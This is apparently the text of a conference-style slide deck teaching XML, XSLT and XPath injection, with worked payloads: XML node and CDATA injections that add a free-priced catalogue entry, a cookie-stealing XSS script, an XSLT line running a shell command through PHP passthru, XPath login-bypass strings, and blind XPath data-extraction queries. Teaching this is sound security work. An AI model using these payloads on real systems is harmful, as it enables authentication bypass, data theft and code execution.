XML & XPath Injection

By AMol NAik (@amolnaik4)

Agenda

XML Basic XML Injection XXE Attack XSLT Attacks XPath Basics XPath Injections XPath Tools

All codes are at:

https://bitbucket.org/null0x00/null-humla-xml-injection/

3

4

XML Basics

eXtensible Markup Language Flexible text-based format Presents structured info Used for Data Exchange/Storage

XML Components

Root Element

Node

Node Value

AttributeEntity

CDATA Section

XML – CDATA Section

Tells parser not to use markup for characters in this section

Examples:

<![CDATA[if (c<10)]]>

<![CDATA[<script>alert(1)</script>]>

XML Injections

In Node Attribute

In Node Value

In CDATA Section

XML Injection – Node Attribute

Payload:

102”><author>demo</author><title>Demo

Demo</title><price>FREE</price></book><book id=“

<catalog>

<book id=“101”>

<author>Anonymous</author>

<title>We Are Anonymous</title>

<price>INR 200</price>

</book>

</catalog>

XML Injection – Node Attribute

<catalog>

<book id=“102”>

<author>demo</author>

<title>Demo Demo</title>

<price>FREE</price>

</book>

<book id=“101”>

<author>Anonymous</author>

<title>We Are Anonymous</title>

<price>INR 200</price>

</book>

</catalog>

XML Injection – Node Value

Payload:

Anonymous</author><title>Demo Demo</title><price>FREE</price>

</book><book id=“102”><author>

<catalog>

<book id=“101”>

<author>Anonymous</author>

<title>We Are Anonymous</title>

<price>INR 200</price>

</book>

</catalog>

XML Injection – Node Value

<catalog>

<book id=“101”>

<author>Anonymous</author>

<title>Demo Demo</title>

<price>FREE</price>

</book>

<book id=“102”>

<author>demo</author>

<title>We Are Anonymous</title>

<price>INR 200</price>

</book>

</catalog>

XML Injection – CDATA

Payload:

INR 200]]></price></book><book id=“102”><author>demo</author>

<title>Demo Demo</title><price><![CDATA[

<catalog>

<book id=“101”>

<author>Anonymous</author>

<title>We Are Anonymous</title>

<price><![CDATA[INR 200]]></price>

</book>

</catalog>

XML Injection – CDATA

<catalog>

<book id=“101”>

<author>Anonymous</author>

<title>We Are Anonymous</title>

<price><![CDATA[INR 200]]></price>

</book>

<book id=“102”>

<author>demo</author>

<title>Demo Demo</title>

<price><![CDATA[FREE]]></price>

</book>

</catalog>

XML Entity

Variable Define

Shortcuts

Standard Text

Special Characters

Can be Internal/External

XML Entity

XXE Attack

XSLT

Extensible Stylesheet Language Transformations

Used for the transformation of XML documents

See this as CSS of XML

XSLT

XSLT Injection

XSS

<script>alert(document.cookie)</script>

Code Execution<xsl:value-of select="php:function('passthru','ls -la /')"/>

XPath Basics

Language to select XML Nodes

Formats XML data as tree-structured values

Similar as SQL (in some sense)

XPath Syntax

Uses path expressions to select nodes or node-sets in an xml document

Expression Description

nodename Selects all child nodes of the named node

/ Selects from root node

// Selects nodes from the current node that match the selection no matter where they are

. Selects current node

.. Selects parent of the current node

XPath Predicates

Used to find a specific node or a node that contain specific value.

Always embedded in square brackets.

Expression Result

/Employees/Employee[1] Selects first ‘Employee’ element that is the child of ‘Employees’ element

/Employees/Employee[last()] Selects last ‘Employee’ element that is the child of ‘Employees’ element

/Employees/Employee[position()<3] Selects first 2 ‘Employee’ elements that are children of Employees element

//Employee[@ID=‘1’] Selects all the ‘Employee’ elements that have an attribute named ‘ID’ with a value of ‘1’

XPath Location Path

Syntax: axisname::nodetest[predicate]

an axis - defines the tree-relationship between the selected node & the current node

nodetest – identifies node within an axis

Zero or more predicates – further refines the selected node-set

XPath Location Path

Example Result

child::Employee Selects all ‘Employee’ node that are children of the current node

attribute::id Selects the id attribute of the current node

child::* Selects all children of the current node

attribute::* Selects all attributes of the current node

child::text() Selects all text child nodes of the current node

child::node() Selects all child nodes of the current node

descendant::Employees Selects all ‘Employees’ descendants of the current node

XPath Functions

Function Name Description

substring(str,start,len) Return the substring from the start position to the specified length

string-length(str) Returns length of the string

count(item,item,…) Returns count of the nodes

starts-with(str1,str2) Return ‘True’ if str1 starts with str2, else ‘False’

contain(str1,str2) Return ‘True’ if str1 contains str2, else ‘False’

number(arg) Returns numeric value of agrument. Agrument could be boolean, string or node-set

string(arg) Returns string value of agrument. Agrument could be boolean, string or node-set

XPath Injection

XPath Query:

/Employees/Employee[UserName/text() = ‘user’ and Password/text() = ‘passwd’]/Type/text()

XPath Injection

No UserName & Password known:

user =’ or ‘1’=‘1passwd = ’ or ‘1’=‘1

/Employees/Employee[UserName/text() = ‘’ or ‘1’=‘1’ and Password/text() = ‘’ or ‘1’=‘1’]Type/text()

XPath Injection

UserName known:

user =mbrown’ or ‘1’=‘1passwd = anything

/Employees/Employee[UserName/text() = ‘mbrown’ or ‘1’=‘1’ and Password/text() = ‘anything’]Type/text()

XPath Injection

No UserName & Password known & Password is not vulnerable:

user =’ or ‘1’=‘1’ or ‘1’=‘1passwd = anything

/Employees/Employee[UserName/text() = ‘’ or ‘1’=‘1’ or ‘1’=‘1’ and Password/text() = ‘anything’]Type/text()

Blind XPath Injection

XPath Query:/Employees/Employee[@ID=‘_id_’]

/Employees/Employee[@ID=‘1’ and ‘1’=‘1’] =>TRUE

/Employees/Employee[@ID=‘1’ and ‘1’=‘2’]=>FALSE

Blind XPath Injection

Extracting XML file structure

Get count of all nodes▪ count(/*/child::*)

Get name of first node▪ name(/*/child::*[1])

Get count of child nodes of first node▪ count(/*/child::*[1]/child::*)

Blind XPath Injection

Extracting XML file structure

Get name of first child node of first node▪ name(/*/child::*[1]/child::*[1])

Get value of first child node of first node▪ /*/child::*[1]/child::*[1]/text()

Repeat the process for all child nodes

Blind XPath Injection

Extracting XML file structure

Check if the first character of value of first child node of first node is ‘J’

/Employees/Employee[@ID=‘123’ or substring((/*/child::*[1]/child::*[1]/text()),1,1)=‘J’]

XPath Injection Tools

XPath Blind Explorer

Xcat

xmlchor - IronWASP Plugin

recon-ng

xpath_bruter

References

XPath Injectionhttp://www.slideshare.net/robertosl81/xpath-

injection-3547860 Hacking XPath 2.0http://www.slideshare.net/michelemanzotti/hacki

ng-xpath-20 Blind XPath Injectionhttp://2stop.me/S%C3%A9curit%C3%A9%20Infor

matique/Web/EN%20-%20Blind%20Xpath%20injection.pdf

Thank You !!

AMol NAikhttp://twitter.com/amolnaik4

http://amolnaik4.blogspot.com